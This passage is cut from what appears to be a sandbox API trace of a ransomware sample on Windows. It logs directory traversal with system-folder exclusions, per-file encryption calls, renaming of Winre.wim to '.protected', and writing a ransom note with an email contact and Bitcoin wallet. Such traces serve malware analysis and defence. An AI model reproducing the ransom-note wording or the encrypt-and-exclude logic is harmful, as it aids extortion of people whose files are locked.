nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0077.445] CloseHandle (hObject=0xa4) returned 1 [0077.446] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.protected") returned 72 [0077.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.protected" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.protected")) returned 1 [0077.446] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0077.446] FindClose (in: hFindFile=0x47b910 | out: hFindFile=0x47b910) returned 1 [0077.447] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\RESTORE_FILES.txt") returned 70 [0077.447] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\RESTORE_FILES.txt" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0077.490] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.490] WriteFile (in: hFile=0x104, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0077.491] lstrlenA (lpString="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") returned 684 [0077.491] WriteFile (in: hFile=0x104, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0077.491] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.491] WriteFile (in: hFile=0x104, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0077.491] CloseHandle (hObject=0x104) returned 1 [0077.492] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0077.492] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0077.492] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\RESTORE_FILES.txt") returned 33 [0077.492] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\RESTORE_FILES.txt" (normalized: "c:\\recovery\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xdc [0077.493] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.493] WriteFile (in: hFile=0xdc, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0077.494] lstrlenA (lpString="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") returned 684 [0077.494] WriteFile (in: hFile=0xdc, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0077.494] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.494] WriteFile (in: hFile=0xdc, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, 
lpOverlapped=0x0) returned 1 [0077.494] CloseHandle (hObject=0xdc) returned 1 [0077.494] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="Windows") returned -1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="Program Files") returned 1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="Program Files (x86)") returned 1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="$Recycle.bin") returned 1 [0077.494] lstrcmpiW (lpString1="System Volume Information", lpString2="System Volume Information") returned 0 [0077.494] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="Windows") returned -1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="Program Files") returned 1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="Program Files (x86)") returned 1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="$Recycle.bin") returned 1 [0077.494] lstrcmpiW (lpString1="Users", lpString2="System Volume Information") returned 1 [0077.494] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users") returned 12 [0077.494] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0077.494] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0077.494] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\*") returned 14 [0077.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x47b910 [0077.495] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.495] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.495] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.495] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.495] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.495] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\.") returned 14 [0077.495] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.495] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0077.495] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0077.495] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0077.495] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0077.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\." (normalized: "c:\\users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.495] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.495] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.495] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.495] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.495] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.495] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.495] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\..") returned 15 [0077.495] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.495] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.495] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0077.495] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0077.495] CryptGenRandom 
(in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0077.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0077.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.496] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="Windows") returned -1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="Program Files") returned -1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="Program Files (x86)") returned -1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="$Recycle.bin") returned 1 [0077.496] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="System Volume Information") returned -1 [0077.496] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 33 [0077.496] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0077.496] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0077.496] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 35 [0077.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x47b950 [0077.496] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.496] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.496] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.496] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.496] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.496] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\.") returned 35 [0077.496] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.496] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.497] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.497] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.497] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.497] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.497] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.497] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\..") returned 36 [0077.497] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.497] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.497] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="Windows") returned -1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="Program Files") returned -1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="Program Files (x86)") returned -1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="$Recycle.bin") returned 1 [0077.497] lstrcmpiW (lpString1="AppData", lpString2="System Volume Information") returned -1 [0077.497] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 41 [0077.497] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0077.497] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0077.497] 
wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*") returned 43 [0077.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0077.498] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.498] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.498] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.498] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.498] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.498] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\.") returned 43 [0077.498] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.498] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0077.498] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0077.498] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0077.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0077.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.498] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.498] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.498] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.498] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.498] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.499] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.499] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\..") returned 44 [0077.499] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.499] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.499] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0077.499] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0077.499] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0077.499] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0077.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.499] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="Windows") returned -1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="Program Files") returned -1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="Program Files (x86)") returned -1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="$Recycle.bin") returned 1 [0077.499] lstrcmpiW (lpString1="Local", lpString2="System Volume Information") returned -1 [0077.499] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 47 [0077.499] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0077.499] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0077.499] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*") returned 49 [0077.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0077.500] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.500] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.500] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.500] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.500] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.500] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\.") returned 49 [0077.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 
[0077.500] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.500] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.500] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.500] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.500] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.500] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.500] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\..") returned 50 [0077.500] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.500] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.500] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0077.500] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe") returned 53 [0077.500] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0077.500] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0077.501] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*") returned 55 [0077.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 
[0077.501] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.501] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.501] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.501] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.501] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.501] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\.") returned 55 [0077.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.501] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.501] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.501] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.501] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.501] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.501] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.501] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\..") returned 56 [0077.501] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.501] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.501] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0077.501] wnsprintfW 
(in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat") returned 61 [0077.502] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0077.502] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0077.502] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*") returned 63 [0077.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0077.502] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.503] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.503] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.503] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.503] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.503] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\.") returned 63 [0077.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.503] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0077.503] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.503] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.503] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.503] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.503] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.503] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\..") returned 64 
[0077.503] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.503] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0077.503] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0") returned 66 [0077.503] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0077.503] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0077.503] wnsprintfW 